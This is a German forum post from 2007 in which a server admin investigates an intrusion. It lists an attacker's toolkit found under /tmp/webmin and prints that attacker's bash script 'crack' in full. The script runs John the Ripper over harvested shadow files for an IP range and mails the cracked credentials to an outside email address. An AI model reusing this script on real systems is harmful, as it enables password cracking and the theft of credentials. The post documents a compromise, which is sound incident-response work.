trotz deaktiviertem root-login UND key-Auth
Ist register-globals=on ein nennenswertes Sicherheitsloch?
Heute Abend schaue ich mal nach, was alles für Dateien mit dem Besitzer www-data herumfliegen
Quasi die Page dem Server anpassen, und nicht umgekehrt![]()
echo566:/tmp# ls -lash
insgesamt 40K
4,0K drwxr-xr-x 7 root root 4,0K 2007-12-11 21:55 .
4,0K drwxr-xr-x 22 root root 4,0K 2007-12-11 21:52 ..
4,0K drwxrwxrwt 2 root root 4,0K 2007-12-10 19:25 .ICE-unix
4,0K drwx------ 2 root root 4,0K 2007-12-10 19:28 mc-root
4,0K drwxr-xr-x 2 www-data www-data 4,0K 2007-12-11 17:47 .p
[B]4,0K drwxr-xr-x 3 www-data www-data 4,0K 2007-12-11 21:46 webmin[/B]
4,0K drwxrwxrwt 2 root root 4,0K 2007-12-10 19:25 .X11-unix
echo790:/tmp/webmin# ls -lash
insgesamt 3,4M
4,0K drwxr-xr-x 4 www-data www-data 4,0K 2007-12-11 22:02 .
4,0K drwxr-xr-x 7 root root 4,0K 2007-12-11 21:55 ..
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:21 .0.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .100.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .101.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .102.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .103.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .10.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .11.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .12.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .13.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .14.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .15.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .16.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .17.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .18.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .19.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:21 .1.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .20.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .21.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .22.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .23.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .24.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .25.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .26.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .27.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .28.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .29.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:21 .2.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .30.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .31.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .32.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .33.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .34.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .35.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .36.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .37.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .38.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .39.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:21 .3.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .40.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .41.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .42.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .43.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .44.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .45.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .46.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .47.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .48.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .49.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:21 .4.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .50.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .51.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .52.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .53.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .54.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .55.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .56.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .57.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .58.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .59.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:21 .5.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .60.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .61.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .62.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .63.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .64.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .65.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .66.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .67.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .68.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .69.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .6.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .70.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .71.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .72.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .73.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .74.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .75.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .76.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .77.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .78.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .79.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .7.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .80.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .81.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .82.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .83.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .84.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .85.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .86.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .87.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .88.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .89.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .8.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .90.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .91.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .92.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .93.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .94.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .95.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .96.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .97.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .98.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .99.pscan.10000
0 -rw-r--r-- 1 www-data www-data 0 2007-12-11 18:22 .9.pscan.10000
4,0K -rwxr-xr-x 1 www-data www-data 1,1K 2006-09-26 01:17 a
4,0K -rwxr-xr-x 1 www-data www-data 264 2006-09-23 03:47 auto
4,0K -rw-r--r-- 1 www-data www-data 3,5K 2007-12-11 17:58 crack
2,2M -rwxr-xr-x 1 www-data www-data 2,2M 2005-09-10 07:56 curl
4,0K -rwxr-xr-x 1 www-data www-data 1,5K 2006-09-24 07:25 getpasswd
4,0K -rwxr-xr-x 1 www-data www-data 1,5K 2006-09-24 07:26 getshadow
196K -rwxr-xr-x 1 www-data www-data 192K 2006-09-23 00:19 john
16K -rw------- 1 www-data www-data 15K 2006-05-26 00:56 john.conf
4,0K -rwxr-xr-x 1 www-data www-data 3,0K 2007-03-03 16:02 mass
4,0K -rwxr-xr-x 1 www-data www-data 3,4K 2007-12-11 18:21 run
4,0K -rw-r--r-- 1 www-data www-data 3,9K 2007-12-11 18:22 run.log
20K -rwxr-xr-x 1 www-data www-data 19K 2005-09-10 07:56 scan
4,0K drwxr-xr-x 2 www-data www-data 4,0K 2007-12-11 22:02 scan_87.118
792K -rwxr-xr-x 1 www-data www-data 786K 2005-09-10 07:56 src.tgz
4,0K -rwxr-xr-x 1 www-data www-data 1,1K 2007-03-03 16:05 start
4,0K -rw-r--r-- 1 www-data www-data 3,2K 2007-12-11 21:58 uniq_87.118.txt
184K -rwxr-xr-x 1 www-data www-data 178K 2005-09-10 07:56 unshadow
4,0K drwxr-xr-x 2 www-data www-data 4,0K 2007-03-03 15:43 words
/tmp/webmin# cat crack
#!/bin/bash
only_crack_root_accounts=0
crack_blowfish=0
use_small=1
alert=1
address=simplu_cry@yahoo.com
if [ $# != "2" ]
then
echo "# usage: $0 211.111 <passfile>"
echo "# dir scan_211.111/ must exist."
exit;
fi
echo "# let's see what john the ripper has to say about $1.*"
if [ $only_crack_root_accounts -eq 0 ]; then
./john -se=$1_DES_session -w=$2 -fo=DES --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync scan_$1/*
if [ $use_small -eq 0 ]; then
./john -se=$1_MD5_session -w=$2 -fo=MD5 --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync scan_$1/*
if [ $crack_blowfish -eq 1 ]; then
./john -se=$1_BF_session -w=$2 -fo=BF --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync scan_$1/*
fi
else
echo "# using $2 for the MD5/BF hashes..."
./john -se=$1_MD5_session -w=$2 -fo=MD5 --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync scan_$1/*
if [ $crack_blowfish -eq 1 ]; then
./john -se=$1_BF_session -w=$2 -fo=BF --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync scan_$1/*
fi
fi
else
./john -se=$1_DES_session_uid0 -w=$2 -fo=DES --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync --users=0 scan_$1/*
if [ $use_small -eq 0]; then
./john -se=$1_MD5_session_uid0 -w=$2 -fo=MD5 --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync --users=0 scan_$1/*
if [ $crack_blowfish -eq 1 ]; then
./john -se=$1_BF_session_uid0 -w=$2 -fo=BF --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync --users=0 scan_$1/*
fi
else
echo "# ./john -se=$1_MD5_session_uid0 -w=$2 -fo=MD5 --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync --users=0 scan_$1/*"
./john -se=$1_MD5_session_uid0 -w=$2 -fo=MD5 --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync --users=0 scan_$1/*
if [ $crack_blowfish -eq 1 ]; then
echo "# ./john -se=$1_BF_session_uid0 -w=$2 -fo=BF --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync --users=0 scan_$1/*"
./john -se=$1_BF_session_uid0 -w=$2 -fo=BF --shells=-nologin,expired,date,/dev/null,false,emailonly,ftponly,badsh,/sbin/nologin,/nonexistent,sync --users=0 scan_$1/*
fi
fi
fi
echo "# updating the files in scan_$1/.."
cd scan_$1
find . -type f > ../lista.txt
for elem in $(cat ../lista.txt); do
echo -n "#"
../john -show $elem >> $elem
echo $elem >> ../status_$1
../john -show $elem >> ../status_$1
echo "-------------------------------------" >> ../status_$1
done
echo "# check status_$1 and the dir scan_$1/ "
rm -f ../lista.txt &>/dev/null
if [ $alert -eq 1 ]; then
un=`uname -n`
mail -s "$un is done." $address < ../status_$1
echo "--------Esti Rau Ma Soarece-------"
mail -s "$un is done." [email]simplu_cry@yahoo.com[/email] < ../status_$1
fi
echo gata
We use cookies and similar technologies to provide the best experience on our website. You can choose which purposes you consent to. Your choice applies across websites using the same consent framework.
Below you can select which purposes you consent to. Purpose 1 is required for basic website functionality.
Cookies, device or similar online identifiers together with other information can be stored or read on your device for the purposes presented to you.
Ads can be shown to you based on the content you are viewing, the app you are using, your approximate location, or your device type.
A profile can be built about you and your interests to show you personalised ads that are relevant to you.
Personalised ads can be shown to you based on a profile about you.
A profile can be built about you and your interests to show you personalised content that is relevant to you.
Personalised content can be shown to you based on a profile about you.
The performance and effectiveness of ads that you see or interact with can be measured.
The performance and effectiveness of content that you see or interact with can be measured.
Market research can be used to learn more about the audiences who visit sites/apps and view ads.
Your data can be used to improve existing systems and software, and to develop new products.
Content can be selected based on limited data, such as the content you are viewing or the device you are using.
Below is a list of all technology vendors that may process your data. You can enable or disable each vendor individually.